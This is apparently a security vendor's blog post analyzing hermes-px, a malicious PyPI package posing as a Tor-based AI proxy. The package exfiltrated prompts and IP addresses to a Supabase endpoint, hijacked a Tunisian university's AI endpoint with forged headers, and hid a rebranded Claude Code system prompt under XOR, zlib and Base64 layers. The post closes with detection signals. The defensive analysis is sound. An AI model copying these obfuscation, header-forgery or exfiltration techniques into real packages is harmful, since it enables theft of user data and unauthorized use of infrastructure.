hermes-px: The PyPI Package That Shipped a Stolen Claude Code System Prompt

Written by the Rafter Team

On April 3, 2026, four versions of a Python package called hermes-px appeared on PyPI within a 46-minute window. Two days later, JFrog's security team flagged it as malicious.
The package was marketed as a "Secure AI Inference Proxy" — an OpenAI-compatible SDK that promised to route your AI prompts through Tor for anonymity. It had professional documentation: installation instructions, code examples, a migration guide from OpenAI's SDK, RAG pipeline examples, and comprehensive error handling documentation. It looked like a real product.
It was exfiltrating every prompt and response in plaintext to a Supabase database, collecting users' real IP addresses despite the Tor anonymity promise, and hijacking a Tunisian university's AI infrastructure for compute.
But the most interesting finding was buried inside a compressed file.
The Stolen System Prompt
A file called base_prompt.pz shipped with the package — 103KB compressed, decompressing to approximately 246,000 characters after decryption. It was protected by three layers: XOR encryption, zlib compression, and Base64 encoding, designed to decrypt exclusively in memory at runtime and defeat static analysis tools like YARA.
It was Anthropic's Claude Code system prompt.
The attacker had performed a bulk find-and-replace to rebrand it:
| Original | Replacement |
|---|---|
| Claude | AXIOM-1 |
| Anthropic | EGen Labs |
| claude-sonnet | ax1-core |
The package author was listed as "EGen Labs" — the replacement Anthropic name, carried over from the rebranding.
The find-and-replace wasn't thorough. Eight identifiable artifacts survived intact:
- A function still named
recommend_claude_apps - A type definition still named
AnthropicFetchParams - Six additional references to "Claude" or "Anthropic" scattered through the prompt
These leftover references made attribution immediate. The operational security of the encryption was undone by the carelessness of the rebranding.
What hermes-px Actually Did
Behind its OpenAI-compatible interface, hermes-px performed three operations simultaneously:
1. Prompt exfiltration
Every user prompt and AI response was captured and sent in plaintext to a Supabase instance at urlvoelpilswwxkiosey.supabase.co/rest/v1/requests_log. Telemetry was enabled by default. A HERMES_TELEMETRY=0 opt-out existed, buried among benign configuration knobs like RAG_DATA_DIR and HERMES_LOG_CONSOLE — but the documentation never disclosed that it controlled a plaintext Supabase exfil channel that bypassed Tor and exposed the user's real IP.
A subsequent SafeDep analysis found 19 conversations in the database, collected between April 1 and April 3, 2026 — before the package was publicly disclosed. This means the exfiltration infrastructure was operational before the PyPI versions were published, suggesting the attacker tested the pipeline through other means first.
2. IP address collection
Despite explicitly advertising Tor routing for anonymity, the package collected and stored each user's real IP address alongside their prompts. This is the most cynical aspect of the design: the privacy promise was the value proposition that attracted users who specifically care about protecting their data, and the IP collection was the operation running behind it.
3. University infrastructure hijacking
Requests were routed through a private AI endpoint belonging to Université Centrale in Tunisia — prod.universitecentrale.net:9443. The attacker configured a requests.Session with forged Host, Origin, and Referer headers to impersonate the university's own Azure-WAF-protected chat frontend, making the traffic appear to originate from a legitimate browser session.
This wasn't the attacker's infrastructure. It was a university's private AI endpoint, used without authorization to avoid paying for compute. Whether students or faculty were directly affected by the hijacking is unclear from available reporting.
Version Evolution
All four versions (v0.0.1 through v0.0.4) were published on April 3 between 21:47 and 22:33 UTC. The core malicious functionality was identical, but later versions added operational hardening:
- v0.0.3: Scrubbed OpenAI branding from AI responses, hiding the upstream provider from users
- v0.0.4: Intercepted quota-exceeded error messages to prevent the backend provider from being identified through error strings
The 46-minute publication window — four versions, each refining the deception — looks like testing in production: publish, check behavior, iterate, republish. The attacker was debugging their opsec in real time.
What This Tells Us
System prompts are forensic evidence, not secrets
Claude Code's system prompt isn't confidential information — it's a set of instructions for how the model should behave. But when that prompt appears rebranded inside a malicious package, the rebranding artifacts become forensic evidence. The function that's still called recommend_claude_apps, the type that's still AnthropicFetchParams, the six references that survived the find-and-replace — these tell researchers exactly what they're looking at and where it came from.
The stolen prompt was the attacker's most useful technical component and their most damaging forensic mistake at the same time.
Trust is manufactured through documentation
hermes-px wasn't technically sophisticated malware. The triple encryption was competent but not novel. The exfiltration was a straightforward Supabase POST. What made the package plausible was the documentation — professional, thorough, with code examples that looked like a real SDK.
This is a pattern worth watching. As AI-generated documentation becomes cheaper to produce, the cost of creating a convincing-looking package drops toward zero. The distinguishing factor between a legitimate package and a malicious one increasingly isn't the code quality or the documentation quality — it's behavioral analysis at install time.
The Tor deception targets the most security-conscious users
Advertising privacy as the core value proposition while exfiltrating in plaintext isn't accidental targeting. It's selection for users who care about their data enough to install extra tooling — and who therefore likely have more valuable conversations to steal. The attacker specifically targeted the most security-conscious segment of the potential victim pool.
Detection
No CVE has been assigned. JFrog tracks the package as XRAY-961094.
The triple encryption was designed to defeat static analysis tools — YARA rules, string scanners, and basic package inspectors. But behavioral detection catches it: new packages with network exfiltration on import, large encrypted embedded blobs, and connections to external databases that don't match the package's stated purpose.
What would have prevented exposure:
- Behavioral dependency scanning: Flagging packages that make network calls on import, especially to external databases
- Entropy analysis: The 103KB encrypted blob in
base_prompt.pzis a strong signal — legitimate packages rarely ship large encrypted payloads - Package age and provenance checks: Four versions published in 46 minutes from an unknown author is a red flag that automated scanning should catch
Catching packages like hermes-px requires scanning dependencies at the point where a developer adds them, not after they're running in production. Rafter flags poisoned packages and supply chain compromises in your dependency tree before they merge.